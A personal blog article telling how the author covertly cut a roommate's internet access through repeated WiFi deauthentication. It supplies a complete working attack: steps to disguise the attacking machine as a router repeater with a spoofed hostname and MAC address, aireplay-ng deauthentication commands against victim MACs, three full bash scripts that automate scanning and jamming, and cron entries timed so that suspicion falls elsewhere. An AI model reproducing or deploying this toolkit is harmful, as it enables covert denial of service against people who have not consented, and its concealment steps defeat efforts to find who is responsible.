SF-Productions

Stealth DoS Attack

(against a WiFi device)

Disclaimer: This article is ethically wrong. I am not responsible for your actions. To avoid legal issues: Do only try this at home with all people involved being content.

Some years ago, I had some serious trouble with a roommate. The day this escalated, I decided to block Internet access to that person while pulling myself out of the line. Blacklisting the unwanted MAC address in the router settings was not an option. Something subtle was the way to go.
My first idea was using a lovely tool called arpspoof (which is part of the package dsniff) to poison the ARP (Address Resolution Protocol) cache and pull off some kind of man-in-the-middle attack between victim and router. Instead of forwarding the traffic through my machine, I decided not to setup a bridge. The result is a reliable DoS attack.
Unfortunately, when monitoring the traffic via Wireshark, lots of suspicious ARP packages become visible. This demands for a different attack vector: WiFi can always be jammed.

The Solution

The plan sounds easy. We just have to continuously scan the network (silently) and de-authenticate the desired device by spoofing it's MAC on our own WiFi adapter while logging into the network with invalid credentials.
The victim will be disconnected from the network. It will reconnect, but shortly after as it has, it will be disconnected again.

Preparations

The common tools are needed for this project:

computer with Linux OS (Any Raspberry Pi will do)
WiFi adapter
nmap
aircrack-ng
macchanger

Also, MAC addresses of the accesspoints and victims must be known. I recommend using kismet to find them out.

Disguising Our Machine

To be even less suspicious, let's disguise our machine as a repeater.

1. Change the hostname. Example:
hostname -b FRITZRepeater
2. Choose a static IP address which ends on 10 or 100. Example for /etc/network/interfaces: auto eth0 iface eth0 inet static address 192.168.2.10 netmask 255.255.255.0 gateway 192.168.2.1
3. Change the MAC address to look like It's made by AVM. That means it needs to start with C80E14. Because macchanger is more reliable across all distributions, we use that for changing our MAC. Let's assume our network interface is named eth0.
ifconfig eth0 down macchanger --mac=C8:0E:14:3D:11:F3 ifconfig eth0 up

Setup

First of all, we have to put our WiFi interface (we call it wlan0) into monitor mode. It also won't hurt fitting it to the access point's WiFi channel. Let's assume it's ch 11. Depending on your software version, the generated monitor interface will either be called mon0 or wlan0mon. Just save the code below as a shell script, so you can execute it whenever you need: #!/bin/sh airmon-ng check kill airmon-ng start wlan0 11 ifconfig wlan0mon down macchanger -a wlan0mon ifconfig wlan0mon up
If that causes an error, set your WiFi interface into manual and hotplug mode (/etc/network/interfaces). auto wlan0 allow-hotplug wlan0 iface wlan0 inet manual wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

Action

1. We check whether the victim is connected to the network. Because we want to automate this process easily we simply use nmap with the -sP or -sn parameter (depending on our software version). That way, we will not be able to see our pings in wireshark.
Example: nmap -sP 192.168.2.*
2. We playback some nonsense. However, this takes some attempts in order to work out. 5 may be a working value. Next, we need the MAC of the accesspoint (e.g. C8:0E:14:4D:4C:0A) and victim (e.g. 10:41:7F:A3:A8:AA) aireplay-ng -0 5 -a C8:0E:14:4D:4C:0A -c 10:41:7F:A3:A8:AA wlan0mon

Automating The Process

You can download the whole project here. You may tweak a few files if your network interfaces have different names. Also, I did not write a ReadMe, yet, so just follow these instructions:

Put all known hosts in ./hostnames/hostnames.txt. This is used for the logging and monitoring features.
Put all victims' MACs in ./blacklists/blacklist.txt.
Put all accesspoints in .aplists/aplist.txt.
Run the Daemonize.sh. It is set to intervals of 1 minute, but you can add the time as parameter, e.g. Daemonize.sh 30.
You can run the Scanner.sh manually, instead. By adding the parameter --log data is being logged to /var/log/deauth/.

These are the contents of the script files:

Scanner.sh:

#!/bin/bash

logging=1

if [ "$1" == "--help" ]; then
	echo "All parameters are optional."
	echo 'Scanner.sh <hostnames file>'

	echo '-- log Log progress.'	
else

	hostnames="hostnames/hostnames.txt"

	if [ -n "$1" ]; then
		hostnames=$1
	fi

	hosts=$(nmap -sP 192.168.2.*)

	i=0

	while read line; do 
			if [ $i -eq 0 ]; then
				lookup+=" $(echo "$line" | awk '{print $1}') "
			else 
				lookup+="| $(echo "$line" | awk '{print $1}') "
			fi
			i+=1
			
	done < $hostnames

	echo "Found hosts:"
	echo "$(echo "$hosts" | grep -E "$lookup" | awk '{print $5}')"
	online=$(echo "$hosts" | grep -E "$lookup" | awk '{print $5}')
	if [ $logging -eq 1 ] && [ $i -gt 1 ]; then
		now=$(date +"%Y_%m_%d")
		echo $(date) >> /var/log/deauth/$now
		echo "$online" >> /var/log/deauth/$now
	fi
	i=0	
	for line in $online; do
		if [ $i -eq 0 ]; then
				pattern="$line"
				
			else 
				pattern+="|$line"
			fi
			((i++))
						
	done
	echo "entries: $i"
	if [ $i -gt 0 ]; then
		mac=$(cat $hostnames | grep -E "$pattern" | awk '{print $2}')
	
		echo "MACs:"
		echo "$mac"

		echo "$mac" > /tmp/macs.txt
		echo "---Starting---"
		/bin/bash ./DeauthAll.sh /tmp/macs.txt
	else
		echo "Nothing to do."
	fi	
fi

DeauthAll.sh:

#!/bin/bash

if [ "$1" == "--help" ]; then
	echo "All parameters are optional."
	echo 'DeauthAll.sh <client file> <accesspoint file> <packetCount>'
else

	if [ -n "$1" ]; then
		blacklist=$1
	else
		blacklist="blacklists/blacklist.txt"
	fi
	if [ -n "$2" ]; then
		aplist=$2
	else
		aplist="aplists/aplist.txt"
	fi
	if [ -n "$3" ]; then
		count=$3
	else
		count=6
	fi

	while read i; do 
		client=$(echo "$i" | awk '{print $1}') # Do not show comments.
		echo "$client"
	
		while read j; do 
			ap=$(echo "$j" | awk '{print $1}') # Do not show comments.
			aireplay-ng -0 $count -a $ap -c $client wlan0mon;

		done < $aplist
	done < $blacklist

fi

Daemonize.sh:

#!/bin/bash

interval=1m
if [ -n "$1" ]; then
		interval=$1
fi

while true; do 
	echo ""
	echo "----------------"
	echo $(date)
	/bin/bash ./Scanner.sh
	echo "Sleeping for $interval ..."
	sleep "$interval"
	
done

Next Level: Scheduling

My roommates knew who's the IT guy in the house. To divert the suspicion from myself, I had to let the jamming start and stop at times differing from my daily routines. The most common way to achieve this is to start and kill the Daemonize script via cron jobs. Make sure you cd into the project folder. Example entries in /etc/crontab:

2  16	* * 1-5 root	cd /home/pi/deauth/ && /home/pi/deauth/Daemonize.sh &
59 23	* * 1-5 root	pkill Daemonize.sh